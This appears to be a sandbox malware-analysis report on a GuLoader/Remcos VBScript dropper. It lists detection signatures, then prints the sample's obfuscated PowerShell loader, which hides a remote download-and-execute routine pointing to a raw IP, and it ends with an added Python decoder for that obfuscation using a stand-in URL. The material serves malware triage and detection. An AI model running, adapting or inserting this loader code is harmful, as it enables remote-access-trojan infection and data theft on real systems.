Analysis Report
PO_La-Tanerie04180240124.vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6924 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 6228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1; $Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){.($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lH aT/L5 .S0. (IWTi nPd .oMwOs. AN PT .1 0s.f 0 ;. eWViH nD6F4,;c T xT6,4 ;F D r vM:,1.2 1 .,0,)O e GGeCc,k oA /D2M0S1,0 0A1 0,1C W F i.r.e fH oEx / 1 2A 1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS '; $Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2 ,1E. 1A0U5 .C1S6S3h/ .F l y,v,n iCn gKs.. u.3 2D '; $Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe ,xA ';$Thailndernes = Sughs 'r eNchh o. U % a p p dE aGt aE%N\ E y.eMlRiA k.e.0 .aF. o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g .lTotbBaOl R:kBFaUc t Ce,r iUoSp h aEg oRu Us,=N( c,m ud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ' );Thiocarbamic (Sughs ' $ gBl, oSbBa l,:S DFiTaOsbtC eDr eso.i sEoPm eUrH =T$GDMa yS bJeTa.mK. s.p lPiSt, (,$ CUo l oUl iTtCeI )P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.g AlUo b a.l R: NAo.nUz eAbVrLaM= DNPe wF-,O ,b,j eMc t HS y.sLtE eSmB.sN e t,.EW e b CslAi.e.nV tF ');Thiocarbamic (Sughs ' $, N o,n.z e. b,rBaB.AHL e aGdAe r sS[ $ LioA bCuTlDa r iRa,]U= $O u,dbr,jA ' );$Nonassigned=Sughs 'VN,oUn z eAb r,a . .DMoSwFn l Oo,a dSFSi lIeh(C$ D Ta yEb eAa m , $ FHo nRt,eTr.n .eRsD7P2 ) B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned; $Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFl So.b,a lF: RGAebn.kSo mSsRtReDn ,sT=.(.TBe .s t -dPLa tAh J$BFC oSn,tMe r. n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb, aGl,: F jA osrDt e,nR dMeAd.ealF eF=A$ tLrR u eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPt Aa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$S g l oCb,aU l : GSe n k oGmSsPtF e n sA=G( Tke,s,tN-R PSaGtBhA M $ FPo n t, eOrAnteOsD 7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o .bKa,l : S JtUr.aAt e g.iDcWaEl ,=S$Mgkl o PbEa,lS: S e rLgCeVa ,nNt.s 2,3 N+G+ % $ D GiEa.sRt,e ,rSemosi s Bo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$, gAlMoNb a l :FPSrBaE eRlUe,c tT oBrP S=, I GOeStB-CC o,n t efnB t u$.FDoDn Ot evr nDe s.7V2T ') ;Thiocarbamic (Sughs 'O$ g lDo DbHaLlM:,F LiRjFiaa n Oe,r eCs L =U E[ S,y sPt,e.mH.M CAo n,v.e, rDtK] : :S FNr.oDm BK aBsEeP6U4D Spt r isnl gE(C$ PCr aVe l e c. t.onrV) ') ;Thiocarbamic (Sughs
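The PowerShell stage in the process tree hides its real script inside the quoted literals handed to Sughs: the function walks a literal from index 1 up to (but not including) Length-1 in steps of two and concatenates the characters it visits, so every odd-indexed character is payload and every even-indexed one is filler; the method name is assembled as 'Substrin'+'g' so "Substring" never appears verbatim, and Thiocarbamic dot-invokes each decoded literal. The decoder below is an added example for triaging such a command line; it is not part of the sandbox report or the sample. The filler alphabet, the "iex" stand-in and the example.invalid URL are constructed for the test and are not taken from the page.

```python
"""Reference decoder for the odd-index character interleaving used by the
PowerShell loader stage (added example; not from the report or the sample)."""
import re


def sughs(literal: str) -> str:
    """Python equivalent of the dropper's Sughs():
        For($i=1; $i -lt $s.Length-1; $i+=2){ $out += $s.Substring($i, 1) }
    Indices 1, 3, 5, ... strictly below Length-1, so the last (filler)
    character is never read."""
    return literal[1:len(literal) - 1:2]


def interleave(payload: str, junk: str = "Q,x. Z-") -> str:
    """Inverse of sughs(): junk, payload[0], junk, payload[1], ..., junk.
    Deterministic filler keeps the example reproducible; the real sample
    uses arbitrary letters, digits, punctuation and spaces as filler."""
    out = []
    for i, ch in enumerate(payload):
        out.append(junk[i % len(junk)])
        out.append(ch)
    out.append(junk[len(payload) % len(junk)])
    return "".join(out)


# Matches   Sughs '<literal>'   in a command line. The literals in this sample
# contain no quote characters; a PowerShell literal with a doubled '' escape
# would need  '((?:[^']|'')*)'  instead.
LITERAL_RE = re.compile(r"Sughs\s+'([^']*)'")


def decode_literals(cmdline: str) -> list[str]:
    """Return every Sughs literal in cmdline, decoded, in source order.
    Concatenated in order these are the loader's real stage-2 script."""
    return [sughs(m.group(1)) for m in LITERAL_RE.finditer(cmdline)]


# Constructed stand-in for the real command line (not the sample's bytes):
# an invoke alias, a header name and a download URL, each interleaved.
SAMPLE_CMDLINE = (
    "$x=Sughs '" + interleave("iex") + "';"
    "$ua=Sughs '" + interleave("User-Agent") + "';"
    "$u=Sughs '" + interleave("http://example.invalid/stage2.bin") + "';"
)

if __name__ == "__main__":
    for decoded in decode_literals(SAMPLE_CMDLINE):
        print(repr(decoded))
```

Run against a real command line, the decoded literals read as ordinary PowerShell (variable assignments, a download loop, Base64 decoding), which is the stage to pull indicators from rather than the interleaved text the AV engines see.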